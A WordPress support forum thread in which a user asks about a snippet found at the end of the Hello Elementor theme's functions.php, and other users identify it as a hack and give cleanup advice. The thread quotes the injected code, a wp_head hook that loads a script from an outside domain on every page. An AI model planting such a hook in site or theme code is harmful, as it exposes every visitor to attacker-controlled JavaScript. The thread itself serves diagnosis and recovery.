Strange Code on Functions.php

  • mcprime

    (@mcprime)


    8 months ago

    I recently checked the functions.php of Hello Elementor theme and found out at the very bottom contain this code.

    /**<js>*/function add_my_code() {
       echo '<script async src="https://billing.roofnrack.us/dh+V4w099ooSPa/RQSi5wQQ9r8EbPeg="></script>';
    }
    add_action('wp_head', 'add_my_code');/**<js>*/

    I checked the theme repository and they don’t have this kind of code. I don’t even know the URL put there. Can someone explain?

Viewing 3 replies - 1 through 3 (of 3 total)
  • r1k0

    (@r1k0)

    8 months ago

    Hey @mcprime,

    It sounds like your site has been hacked. The code above injects an external JavaScript script into every page with the wp_head hook. The link is not related to Elementor or any other part of WordPress. Following the WordPress “My site was hacked” guide will help you recover your site.

    Additionally, if possible, contact your hosting provider to help you check the logs to determine when functions.php was last edited. Using a backup older than when the file was edited would be an easy and safe way to recover your site.

    Regards,
    Erick

    Thread Starter mcprime

    (@mcprime)

    8 months ago

    Hey @r1k0 ,

    Thanks a ton for the heads-up and the clear explanation!

    I’ll go through the WordPress hacked site guide and reach out to my hosting provider to check the logs — hopefully I can pinpoint when functions.php was edited. If I’ve got a clean backup from before that, I’ll restore it.

    Really appreciate you taking the time to help me out. 🙏

    Cheers

    • This reply was modified 8 months ago by mcprime.
    Avinash Zala

    (@avinashzala01)

    6 months, 3 weeks ago

    Hello @mcprime ,
    You can still scan your website code with gotmls plugin which will help you to get detailed analysis of files of your wordpress in your admin panel. I hope this will help you clear malware code from entire wordpress directory.

Viewing 3 replies - 1 through 3 (of 3 total)

The topic ‘Strange Code on Functions.php’ is closed to new replies.